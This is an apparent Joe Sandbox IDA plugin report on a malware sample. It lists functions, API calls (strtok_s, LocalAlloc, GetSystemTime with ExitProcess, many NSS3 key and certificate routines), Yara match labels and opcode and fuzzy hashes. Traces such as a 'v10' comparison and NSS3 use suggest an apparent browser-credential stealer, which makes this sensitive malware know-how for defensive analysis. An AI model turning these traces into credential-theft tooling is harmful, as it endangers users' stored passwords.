Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption$5s/
API String ID: 491875419-852466114
Opcode ID: bde8e31d180274591635194a4d51c7f4202e62ae120491756324ae48981ab88e
Instruction ID: 2a8a53fd4cd5082e5bad952c71ce53ce1821596221f4621a45a9f8c290f663ab
Opcode Fuzzy Hash: bde8e31d180274591635194a4d51c7f4202e62ae120491756324ae48981ab88e
Instruction Fuzzy Hash: 1F014932F00208BBC7008B7ADC01B9BB7F5BB44308F85843DE95D9BA41EB31AC098791

Uniqueness

Uniqueness Score: -1.00%

Function 0040F200 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F228
strtok_s.MSVCRT ref: 0040F36D

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,041431B0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: cca630b2f95f4e826e9a6c859236e500537583a630315fa027596be9967944d5
Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
Opcode Fuzzy Hash: cca630b2f95f4e826e9a6c859236e500537583a630315fa027596be9967944d5
Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004097F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040980B
memset.MSVCRT ref: 0040983E
LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,041431B0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

@, xrefs: 00409847
v10, xrefs: 00409802

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: 6fffcccd7e913edef19ca93c74df1373176caef86faec32c86a0297b7053f467
Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
Opcode Fuzzy Hash: 6fffcccd7e913edef19ca93c74df1373176caef86faec32c86a0297b7053f467
Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6CE0EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE0EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CE0EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CE0EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE0EEEB
free.MOZGLUE(?), ref: 6CE0EEF6

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 441db6f1a56453d3ca6d449eebfafca4701c29743a92970904f3a76ba8bf8ffd
Instruction ID: b0886f79169ae729d84bab562754de64d5660985eac1b37ebcba30aa1d7d9000
Opcode Fuzzy Hash: 441db6f1a56453d3ca6d449eebfafca4701c29743a92970904f3a76ba8bf8ffd
Instruction Fuzzy Hash: 63312571B00A149BEB209F2CDC447667BB4FB46308F240538E8DA87B50D731E466CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE144D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6CE144FF

Part of subcall function 6CE707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE18298,?,?,?,6CE0FCE5,?), ref: 6CE707BF
Part of subcall function 6CE707B0: PL_HashTableLookup.NSS3(?,?), ref: 6CE707E6
Part of subcall function 6CE707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE7081B
Part of subcall function 6CE707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE70825

SECOID_FindOID_Util.NSS3(?), ref: 6CE14524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CE14537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6CE14579

Part of subcall function 6CE141B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CE141BE
Part of subcall function 6CE141B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CE141E9
Part of subcall function 6CE141B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CE14227
Part of subcall function 6CE141B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6CE1423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE1459C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: 13d72b0738705b3e527eace65e8b2d47a6a5ccc80030c641561b66e773be6783
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: C821C4B17096049BEB10CE2AEC44F6737B99F4265CF34042AF816CBF41E721E925C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 004135E0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,041431B0,?,0041D8AC,?,00000000,?), ref: 0041362C
sscanf.NTDLL ref: 00413659
SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,041431B0,?,0041D8AC), ref: 00413672
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,041431B0,?,0041D8AC), ref: 00413680
ExitProcess.KERNEL32 ref: 0041369A

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 2d8e78d0dab9869f9047db96de010d3925a814e04e314d7ab9fafc73e4c55430
Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
Opcode Fuzzy Hash: 2d8e78d0dab9869f9047db96de010d3925a814e04e314d7ab9fafc73e4c55430
Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6CE328A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CE280DD), ref: 6CE328BA
EnterCriticalSection.KERNEL32(?,?,?,?,6CE280DD), ref: 6CE328D3
PR_Unlock.NSS3(?,?,?,?,?,6CE280DD), ref: 6CE328E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6CE280DD), ref: 6CE3290E
free.MOZGLUE(?,?,?,?,?,?,6CE280DD), ref: 6CE3291A

Part of subcall function 6CE29270: DeleteCriticalSection.KERNEL32(?,?,6CE35089,?,6CE33B70,?,?,?,?,?,6CE35089,6CE2F39B,00000000), ref: 6CE2927F
Part of subcall function 6CE29270: free.MOZGLUE(?,?,6CE33B70,?,?,?,?,?,6CE35089,6CE2F39B,00000000), ref: 6CE29286
Part of subcall function 6CE29270: PL_HashTableDestroy.NSS3(?,6CE33B70,?,?,?,?,?,6CE35089,6CE2F39B,00000000), ref: 6CE29292

Part of subcall function 6CE28B50: TlsGetValue.KERNEL32(00000000,?,6CE30948,00000000), ref: 6CE28B6B
Part of subcall function 6CE28B50: EnterCriticalSection.KERNEL32(?,?,?,6CE30948,00000000), ref: 6CE28B80
Part of subcall function 6CE28B50: PL_FinishArenaPool.NSS3(?,?,?,?,6CE30948,00000000), ref: 6CE28B8F
Part of subcall function 6CE28B50: PR_Unlock.NSS3(?,?,?,?,6CE30948,00000000), ref: 6CE28BA1
Part of subcall function 6CE28B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6CE30948,00000000), ref: 6CE28BAC
Part of subcall function 6CE28B50: free.MOZGLUE(?,?,?,?,?,6CE30948,00000000), ref: 6CE28BB8

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: cc4875a42af01b07f3c44292403634d9aae2dd5413ff61fc13a00f0e3e4d948d
Instruction ID: 6834f82ef3ca0bc79677b75f760e92d916f48c330a12cac424c0de5a614ffafe
Opcode Fuzzy Hash: cc4875a42af01b07f3c44292403634d9aae2dd5413ff61fc13a00f0e3e4d948d
Instruction Fuzzy Hash: E22139B5A14A158BCB00BF78C088669BBF0FF05318F215969DCD89B701E734E899CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA04C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6CEA461B,-00000004), ref: 6CEA04DF
TlsGetValue.KERNEL32(?,00000000,?,6CEA461B,-00000004), ref: 6CEA0510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6CEA0520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6CEA461B,-00000004), ref: 6CEA0534
GetLastError.KERNEL32(?,6CEA461B,-00000004), ref: 6CEA0543

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: bc4a9c54a768df28ff3a520a05f054fc5bc57ed06863abfb0ed778d13a8048eb
Instruction ID: 93b35742440c8170bcd121853d8011fb350fa800a25f07a6e5e1f96eb21e721a
Opcode Fuzzy Hash: bc4a9c54a768df28ff3a520a05f054fc5bc57ed06863abfb0ed778d13a8048eb
Instruction Fuzzy Hash: BA113430E142815FDF206AF8DC14B653674AF0231CF704628E42ACBA90EB31D156CA91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE28FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CE30710), ref: 6CE28FF1
PR_CallOnce.NSS3(6CF72158,6CE29150,00000000,?,?,?,6CE29138,?,6CE30710), ref: 6CE29029
calloc.MOZGLUE(00000001,00000000,?,?,6CE30710), ref: 6CE2904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CE30710), ref: 6CE29066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CE30710), ref: 6CE29078

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: ea6d1def9d935bddbc985ae337be3144c71c4bcc52738e1f25b2c4168f45f88a
Instruction ID: ecf377ede531fa02f19b062440cc212d4fc7420fff4633763c9c91a94d79df50
Opcode Fuzzy Hash: ea6d1def9d935bddbc985ae337be3144c71c4bcc52738e1f25b2c4168f45f88a
Instruction Fuzzy Hash: 9311E521B1012957EB2026A9AC04F66B2B8EB827ACF640135FC94C6B41F79BCD5583B1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CE51E10: TlsGetValue.KERNEL32 ref: 6CE51E36
Part of subcall function 6CE51E10: EnterCriticalSection.KERNEL32(?,?,?,6CE2B1EE,2404110F,?,?), ref: 6CE51E4B
Part of subcall function 6CE51E10: PR_Unlock.NSS3 ref: 6CE51E76

free.MOZGLUE(?,6CE3D079,00000000,00000001), ref: 6CE3CDA5
PK11_FreeSymKey.NSS3(?,6CE3D079,00000000,00000001), ref: 6CE3CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CE3D079,00000000,00000001), ref: 6CE3CDCF
DeleteCriticalSection.KERNEL32(?,6CE3D079,00000000,00000001), ref: 6CE3CDE2
free.MOZGLUE(?), ref: 6CE3CDE9

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: e0501305c4268f3e0d6e593a78a528a44178933102f6ed6ef46f845d45f27336
Instruction ID: 8a5a1ede94c149ba0be9caf98a5be7c4919016c6a6f6c5621d06c1544e97f9d4
Opcode Fuzzy Hash: e0501305c4268f3e0d6e593a78a528a44178933102f6ed6ef46f845d45f27336
Instruction Fuzzy Hash: DF119EB2B01121ABDE01AAA6EC44AA6B778BF0425D7600221F91D87E01E732F434C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CEA5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CEA5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEA2CEC

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

PR_EnterMonitor.NSS3(?), ref: 6CEA2D02
PR_EnterMonitor.NSS3(?), ref: 6CEA2D1F
PR_ExitMonitor.NSS3(?), ref: 6CEA2D42
PR_ExitMonitor.NSS3(?), ref: 6CEA2D5B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: dfbda27a5605049d249232297a8db378a39646b3a2ce1022f356de09e8a9103a
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: C00104B5A106406FE6309E66FC40BC7B3B1EF51318F214529E85E9A721E732F8178793

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CEA5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CEA5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEA2D9C

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

PR_EnterMonitor.NSS3(?), ref: 6CEA2DB2
PR_EnterMonitor.NSS3(?), ref: 6CEA2DCF
PR_ExitMonitor.NSS3(?), ref: 6CEA2DF2
PR_ExitMonitor.NSS3(?), ref: 6CEA2E0B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 1d6ee85d1e1b4c6956c945a9b3f502158517704fc6e7db6b94ecccb39a2cbc09
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: FE01A1B5A006006FEA309E66FC41BC7B7B1EF61318F244439E85D9AB11D732F8268693

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CE23090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE3AE42), ref: 6CE230AA
Part of subcall function 6CE23090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE230C7
Part of subcall function 6CE23090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CE230E5
Part of subcall function 6CE23090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE23116
Part of subcall function 6CE23090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE2312B
Part of subcall function 6CE23090: PK11_DestroyObject.NSS3(?,?), ref: 6CE23154
Part of subcall function 6CE23090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE2317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CE199FF,?,?,?,?,?,?,?,?,?,6CE12D6B,?), ref: 6CE3AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CE199FF,?,?,?,?,?,?,?,?,?,6CE12D6B,?), ref: 6CE3AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CE12D6B,?,?,00000000), ref: 6CE3AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CE12D6B,?,?,00000000), ref: 6CE3AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CE12D6B,?,?), ref: 6CE3AEA3

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: a237fd2b8b159058b1259e08e60ba9661ebaab4cc0a40b5b434ded4ead2c9f1f
Instruction ID: e98df23e214f553e4ee92a614e104391e3f182a11a7f01be8118c65fb0c40924
Opcode Fuzzy Hash: a237fd2b8b159058b1259e08e60ba9661ebaab4cc0a40b5b434ded4ead2c9f1f
Instruction Fuzzy Hash: 9E01D676B9403057EF0151EEAC85BAB31788B8765CB281035E80DC7B81F61AE9C683A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CF2ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CF2A6D8), ref: 6CF2AE0D
free.MOZGLUE(?), ref: 6CF2AE14
DeleteCriticalSection.KERNEL32(6CF2A6D8), ref: 6CF2AE36
free.MOZGLUE(?), ref: 6CF2AE3D
free.MOZGLUE(00000000,00000000,?,?,6CF2A6D8), ref: 6CF2AE47

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: aa772ce928b2fbd5b26e2d467436a6b298ebd4c39c139946fe9065644896d276
Instruction ID: 088664825d4b26d7c13a24a23091d2980e1f5680d89ad52d426dc51abd767899
Opcode Fuzzy Hash: aa772ce928b2fbd5b26e2d467436a6b298ebd4c39c139946fe9065644896d276
